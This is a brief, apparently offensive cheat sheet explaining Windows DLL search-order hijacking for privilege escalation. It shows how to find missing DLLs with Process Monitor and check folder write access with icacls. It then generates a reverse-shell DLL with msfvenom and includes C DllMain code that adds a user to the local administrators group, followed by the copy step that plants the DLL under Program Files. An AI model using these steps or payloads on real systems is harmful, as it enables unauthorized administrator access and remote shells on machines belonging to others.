# Windows searches for DLLs in this order (DLL Search Order): # 1. Directory of the application # 2. C:\Windows\System32 # 3. C:\Windows\System # 4. C:\Windows # 5. Current directory # 6. Directories in PATH # Step 1: Find applications that load missing DLLs # Use Process Monitor (ProcMon) — filter on: # Result = NAME NOT FOUND # Path ends with .dll # Process = target application # Step 2: Check if you can write to any of the search path directories icacls "C:\Program Files\TargetApp\" # If writable, place your malicious DLL there # Step 3: Create malicious DLL (evil.dll) # msfvenom -p windows/x64/shell_reverse_tcp LHOST=IP LPORT=4444 -f dll -o missing.dll # Or write in C: # BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason, LPVOID lpReserved) { # if (ul_reason == DLL_PROCESS_ATTACH) { # system("cmd.exe /c net localgroup administrators ram /add"); # } # return TRUE; # } # Step 4: Copy DLL to hijack location and trigger the app copy evil.dll "C:\Program Files\TargetApp\missing.dll" # Restart the app or wait — it loads your DLL as its privilege level